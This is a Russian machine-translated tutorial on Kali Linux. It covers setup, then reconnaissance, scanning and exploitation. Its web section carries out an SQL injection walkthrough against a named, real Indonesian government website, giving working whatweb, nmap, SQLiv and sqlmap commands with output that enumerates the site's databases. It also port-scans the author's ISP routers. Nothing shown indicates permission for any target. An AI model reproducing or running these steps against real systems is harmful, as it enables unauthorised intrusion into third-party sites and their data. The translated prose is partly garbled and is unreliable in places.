Kali Linux Учебник

Kali Linux Tutorial



Если вы эксперт или, по крайней мере, знакомы с Linux, командами и средой, только что установили Kali Linux на свой компьютер, хотите стать мастером Kali Linux или этическим хакером, то вы попали в нужное место. В этой статье я расскажу о руководстве по Kali Linux для пользователей Linux, которые еще не знакомы с Kali, и познакомлю вас с некоторыми из основных методов, используемых для взлома и тестирования безопасности при использовании Kali.

Что такое Kali Linux?

Kali Linux, ( впервые выпущен 13 марта 2013 г. ), который был формально известен как BackTrack, разработанный охранной фирмой Offensive Security, представляет собой криминалистический и ориентированный на безопасность дистрибутив, основанный на ветке тестирования Debian. Kali Linux разработан с учетом тестирования на проникновение, восстановления данных и обнаружения угроз. В начале этого года проект перешел на модель скользящего выпуска, чтобы предоставить пользователям дистрибутива более современные средства безопасности. Kali Linux бесплатна и всегда будет. В него включено более 600 инструментов для тестирования на проникновение.







Почему именно Kali Linux? Вам это подходит?

Kali Linux в последнее время приобрел большую популярность. И этому есть причина. Взлом вернулся в популярную культуру, и это в значительной степени связано с сериалом «Мистер Робот». Популярность г-на Робота помогла Kali Linux привлечь новых пользователей. Люди, практически не знакомые с Linux или чем-либо, связанным с компьютерной безопасностью, теперь пытаются использовать Kali в качестве основного дистрибутива Linux.



Наш самый продвинутый дистрибутив для тестирования на проникновение за всю историю. - Разработчики Kali Linux. (Это написано на главной странице Kali.org в самом верху страницы.) Что вы получаете из этого утверждения? Вы заметили это: APTD (Распространение расширенного тестирования на проникновение)? Здесь буквально нет термина «взлом». Kali Linux такой же, как и другие дистрибутивы Linux. Проще говоря, это дистрибутив Linux, наполненный инструментами безопасности и ориентированный на экспертов по сетевой и компьютерной безопасности. Однако использование Kali Linux сосредоточено только на безопасности и криминалистике.



Дистрибутив Linux - это не что иное, как пакет, содержащий ядро ​​Linux, набор основных утилит и приложений, а также некоторые настройки по умолчанию. Итак, Kali Linux не предлагает чего-то уникального в том смысле, что большинство предоставляемых инструментов можно было бы установить в любом дистрибутиве Linux.





Kali Linux специально разработан для удовлетворения требований профессионального тестирования на проникновение и аудита безопасности. Он нацелен на определенную группу пользователей Linux. Пентестеры, хакеры и т. Д. Это не рекомендуемый дистрибутив, если вы ожидаете, что Kali будет использоваться в качестве универсального рабочего стола Linux для разработки, веб-дизайна, игр, офиса и т. Д. Kali может доставить вам некоторые проблемы, даже если вы опытный пользователь Linux. .

ЧТО ДЕЛАТЬ ПОСЛЕ УСТАНОВКИ KALI LINUX

После установки Kali Linux вы можете задаться вопросом, что с этим делать дальше, не так ли? С этой проблемой сталкиваются все, не волнуйтесь.



ШАГ 1: НАСТРОЙКА ХРАНИЛИЩА

Во-первых, вы, возможно, уже знаете это, но очень важно правильно настроить репозиторий. Как я уже сказал, модель скользящего выпуска Kali Linux направлена ​​на предоставление пользователям дистрибутива более современных утилит безопасности. Обычно, если у вас недавно установлен Kali Linux, репозиторий ссылается на носитель, который вы используете для установки. Чтобы исправить это, вам нужно изменить репозиторий на официальный репозиторий Kali Linux. Требуемый файл находится в /etc/apt/sources.list . Откройте файл с помощью текстового редактора листовой панели и замените репозиторий по умолчанию на этот официальный репозиторий Kali Rolling:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

ШАГ 2: ОБНОВЛЕНИЕ И ОБНОВЛЕНИЕ KALI LINUX

После этого обновления и обновления вашей системы синхронизируйте Kali Linux с последней версией. Для этого откройте терминал и введите:

apt update -y && apt upgrade -y && apt dist-upgrade 

Команда apt update загружает и извлекает информацию о списках пакетов из репозиториев и обновляет их, чтобы получить информацию о новейших версиях пакетов и их зависимостях.

Команда apt upgrade загружает и устанавливает более новую версию пакетов установленных пакетов Kali Linux, если в ней нет ошибок в зависимостях.

Apt dist-upgrade обновит все пакеты до последней доступной версии, несмотря ни на что. А также установите и удалите зависимости по мере необходимости (очевидно, установите зависимости для удовлетворения пакетов, но также удалите зависимости, которые стали потерянными, если пакет, который был обновлен, больше не нуждался в зависимости.

БАЗОВАЯ КОНЦЕПЦИЯ ПЕНЕТРАЦИОННОГО ТЕСТИРОВАНИЯ С KALI LINUX

После того, как вы успешно выполнили эти шаги, есть три основных вещи, которые вы можете сделать с Kali Linux на основе целевой системы, включая:

  1. Взлом беспроводной сети - Взлом Wi-Fi, Phising, ARP Poisoning и т. Д.
  2. Взлом веб-приложений - Внедрение SQL, подделка межсайтовых запросов (CSRF), веб-фишинг и т. Д.
  3. Взлом устройства - Используйте целевую машину, чтобы получить над ней контроль.

Я не говорю о взломе Интернета вещей, это не означает, что Kali Linux не имеет возможности для этого. Но в буквальном смысле это тоже может относиться к взлому устройств. Поскольку устройство имеет внешний вид и форму. В этом уроке я рассмотрел их базовые знания. Поскольку Kali Linux огромен, его не уместить в одной статье!

Вам также необходимо знать цикл или процедуру тестирования на проникновение. Они есть:

  1. Разведка - сбор информации
  2. Сканирование
  3. Операция
  4. Постэксплуатация

ВЗЛОМ БЕСПРОВОДНОЙ СЕТИ С KALI LINUX

Что касается взлома беспроводной сети, жертвы могут быть разными. Потому что беспроводные сети состоят из нескольких вещей, таких как ISP (поставщик Интернет-услуг), маршрутизатор и его партнеры (модем, концентратор, коммутатор и т. Д.) И клиенты (пользователи, система видеонаблюдения, удаленный компьютер и т. Д.). У них также есть уязвимые возможности.

Интернет - это большая и сложная совокупность сетевого оборудования, соединенного между собой шлюзами. Отслеживание маршрута, по которому следуют ваши пакеты, важно, чтобы знать, как вы достигаете определенного имени хоста или целевого IP-адреса.

Kali Linux имеет встроенный инструмент Traceroute. Traceroute использует поле времени жизни протокола IP и пытается вызвать ответ ICMP TIME_EXCEEDED от каждого шлюза на пути к некоторому хосту. Traceroute пытается отследить маршрут, по которому IP-пакет будет следовать к некоторому интернет-хосту, запуская пробные пакеты с небольшим TTL (время жизни), а затем ожидая ответа ICMP о превышении времени, полученного от шлюза. Я дам вам пример и покажу, как отследить маршрутизатор интернет-провайдера, используемый для обработки нашего соединения, с помощью Traceroute.

1. Признание

Сбор информации - это самый важный толчок, не пропустите этот шаг. На этом этапе наша цель - получить как можно больше полезной информации, которую мы могли бы получить, а затем эта информация используется для дальнейших шагов.

Сначала откройте терминал и введите эту команду, чтобы начать отслеживать путь к сайту, в этом случае я установил сайт на google.com.

traceroute google.com 

Скриншот Traceroute

2. Сканирование

После того, как мы запустим команды, он будет перечислять, куда идет наш пакет по порядку. Как вы можете видеть выше, у меня есть 3 перехода, один из которых является моим сервером интернет-провайдера. Первый IP-адрес в списке - это мой маршрутизатор, который действует как шлюз. И следующие два из них принадлежат моему провайдеру. Теперь давайте проверим службу, которую они запускают, с помощью Nmap. Итак, цели, которые мы собираемся сканировать, 10.152.192.1 а также 10.13.223.102 . В терминале я выполнил следующую команду:

nmap -v -sS [IP Target] -Pn 

Давайте разберем аргумент команды:

-v = Включить режим детализации

-sS = Использовать технику сканирования TCP SYN

-Pn = рассматривать все хосты как подключенные - пропустить обнаружение хостов

И вот результат, который мы получили.

Снимок экрана Nmap 2

К сожалению, все порты включены 10.152.192.1 фильтруются, это означает, что все входящие TCP-соединения блокируются IDS или брандмауэром на этом IP-адресе. Теперь давайте сделаем еще одно сканирование второй цели.

снимок экрана nmap 1

3. Эксплуатация

В этой процедуре я не собираюсь проводить настоящую эксплуатацию, вместо этого я покажу вам, как это сделать. Основываясь на приведенном выше результате сканирования Nmap, мы знаем, что на этом IP-адресе есть SSH-сервер, работающий на порту 22, и он открыт. Он открыт для грубого обращения, ха-ха! Мы нашли дыру, этот SSH-сервер - возможная дыра, в которую мы могли бы попытаться получить доступ. В Kali Linux есть несколько инструментов, которые поддерживают грубые атаки или атаки по словарю на протокол SSH. Самая популярная и мощная - Гидра.

Хорошо, это была основная процедура проведения теста на проникновение для целевого сервера, которым в нашем примере является мой сервер интернет-провайдера.

ВЗЛОМ ВЕБ-ПРИЛОЖЕНИЙ С KALI LINUX

На самом деле, если вы увлечены этим, вы можете настроить свою хакерскую среду, установив DWVA (Damn Vulnerable Web App) в свой Kali Linux. Это веб-приложение PHP / MySQL, в котором есть множество уязвимых мест. Его основные цели - помочь специалистам в области безопасности проверить свои навыки и инструменты в правовой среде, а также помочь веб-разработчикам лучше понять процессы защиты веб-приложений. Вы можете получить DWVA бесплатно на Github здесь: https://github.com/ethicalhack3r/DVWA.

А пока я покажу вам, как взломать веб-приложения на реальном сайте. Но, пообещайте мне, это ограничено только образовательной целью. Мы смоделируем реальную атаку на реальном сайте с помощью SQL-инъекции.

Предварительное условие

Охватываемые инструменты:

- Whatweb (предустановлен)

- Nmap (предустановлен)

- SQLiv (установить вручную)

- SQLMap (предустановлен)

Нам нужен еще один дополнительный инструмент, который доступен на Github здесь: https://github.com/Hadesy2k/sqliv, сначала установите его в нашу Kali Linux. Этот инструмент под названием SQLiv может выполнять целевое сканирование, предоставляя определенный домен (со сканированием). Введите в терминал:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Цель: www.trenggalekkab.go.id

1. Признание

Соберите как можно больше полезной информации. Мы могли бы открыть веб-страницу и определить, какое приложение работает на этом сайте. Во-первых, давайте проверим, что это за веб-сайт. Мы собираемся использовать whatweb для этого.

whatweb www.trenggalekkab.go.id 

Какой веб-снимок экрана

Как видно из приведенного выше результата, цель находится в Индонезии. Он работает Apache v2.2.27 на своем веб-сервере, а также PHP v5.4.31 , у него есть IP-адрес 103.247.21.142 . Хорошо, прими это к сведению. Возможно, вам потребуется посетить его веб-страницу, чтобы найти созданный файл или страницу, параметры URL-адреса или даже форму входа. На данный момент нам нужен этот IP-адрес для следующего шага сканирования.

2. Сканирование

Как и раньше, мы снова используем Nmap, чтобы сканировать, какие порты и службы работают на целевой машине.

nmap -v -sS 103.247.21.142 

И вот результат:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Существует множество открытых портов, которые обрабатывают каждую службу на целевом объекте, но привлекает внимание служба mysql на порту 3306. Указывается, что этот сайт использует MySQL управлять своей информацией в базах данных. Тогда мне интересно, есть ли на этом сайте уязвимости SQL-инъекций. Итак, я снова просматриваю сайт, используя только что установленный SQLiv. Я набрал команду:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ScreenShot1

На этом сайте мы обнаружили 2 возможных уязвимых URL-адреса SQL. Запишите эти URL-адреса.

3. Эксплуатация

Хорошо, у нас есть уязвимые URL-адреса SQL, и они готовы к выполнению. Для этого мы будем использовать SQLMap. Синтаксис:

sqlmap [Vulnerable URL] --dbs 

Команда должна выглядеть так:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Аргумент –dbs указывает SQLMap на получение целевых баз данных. Вот результат, который мы получили:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap обнаружил 2 базы данных, но только одна из них содержит конфиденциальные данные, например учетную запись администратора. То есть на trengkab_trg. После того, как мы нашли базы данных, нам нужно сделать еще один шаг. То есть найти таблицы и столбцы, и последний шаг - выгрузить данные. Я не буду показывать вам, как здесь, в этом разделе, используя эту цель. По крайней мере, вы знаете основную идею цикла атаки и используете некоторые инструменты.

ВЗЛОМ УСТРОЙСТВА

В следующей статье на этом сайте мы расскажем о взломе устройств, следите за обновлениями. В качестве предварительного предупреждения вы захотите убедиться, что знаете для этого немного Python.